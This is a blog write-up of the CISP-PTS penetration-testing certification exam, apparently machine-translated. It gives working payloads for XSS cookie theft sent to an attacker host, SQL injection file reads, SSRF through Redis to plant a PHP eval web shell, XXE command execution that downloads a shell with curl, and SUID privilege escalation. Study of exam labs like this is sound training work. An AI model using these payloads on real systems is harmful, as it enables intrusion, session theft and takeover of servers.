banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

cisp-pts exam record

#考证41
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The exam for pts is quick, taking less than two weeks from registration to completion. Those with a solid foundation in problem-solving can pass easily, as many questions are similar to training materials. However, some questions may be unknown to training institutions. **Exam Experiences:** 1. **Scenario 1: XSS + SQL Injection + File Reading** - Used Python to set up a web service for XSS attacks, inserting payloads to capture the admin's cookie. - SQL injection was performed to read files, using payloads and tools like sqlmap. 2. **Scenario 2: SSRF + Redis Getshell** - Scanned directories and downloaded a backup file to find a web port. - Exploited Redis to write a web shell and execute commands. 3. **Scenario 3: XXE Vulnerability** - Used the expect command to write a web shell, allowing command execution and privilege escalation. Overall, the exam involved a mix of web vulnerabilities and exploitation techniques to obtain keys and complete tasks.

The exam for pts took less than half a month from registration to the test. If you have a foundation in practicing questions, it's quite easy to pass, because many questions are basically the same as the training ones. However, there are some questions that the training institutions also don't know. For example, in this exam, the last major question had a service called nacos, and since nacos has no exp, I tried common weak passwords but couldn't get in, so I didn't attempt it. Most of the questions only had 2 keys (20 points), and if you ensure that the previous keys are all obtained, you already have 80 points, and you only need to score above 70 to pass.

Let me talk about the questions I encountered in the exam.

Scenario 1#

xss+sqli+file reading, relatively simple

For xss, you need to use Python to start a web service on the attacking machine, then insert the payload. Here, it utilizes a stored XSS vulnerability to write the payload and obtain the administrator's cookie.

<script>document.write('<img src="http://ip:1234/?cookie='+document.cookie+'" />')</script>

Obtaining the administrator's cookie

By right-clicking in the browser Page - Inspect, selecting Application, finding Storage - Cookies, and replacing it with the administrator's cookie.

Pasted image 20241028150907

sqli payload

http://ip:3603/admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#

Or run sqlmap

http://IP:3603/admin/edit.php?id=11 (GET)  
# sqlmap.py -u http://10.52.0.29:3603/admin/edit.php?id=11 --cookie=PHPSESSID=732ece3c4dcdba588d48593d689bf927 --dbms mysql --file-read /var/key2

Arbitrary file reading

http://IP:3603/admin/setting.php?page=/tmp/key3

Scenario 2#

ssrf+redis getshell

ssrf: Directory scan robots.txt, download backup.zip, unzip to get a txt file, which will provide a web port. Input http://localhost:1234 in the search box provided by the question to obtain the first key.

redis getshell:

Write webshell

dict://localhost:6379/flushall
dict://localhost:6379/set:1:'<?php eval($_POST[1]);?>'
dict://localhost:6379/config:set:dir:/var/www/html/app1
dict://localhost:6379/config:set:dbfilename:a.php
dict://localhost:6379/save

Write private key

Pasted image 20241028151536

Obtain the second key, the third key is in the task schedule.

Scenario 3#

An xxe vulnerability

Write webshell through expect, expect can execute commands, by starting a web service on the attacking machine and using curl to request.

Execute command

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>

Write shell

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://curl$IFS$9-O$IFS$9'192.168.80.48:8088/shell.php'">]><p>&b;</p>

Privilege escalation

find / -perm -u=s -type f 2>/dev/null
find 1 -exec 1s /root \;
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.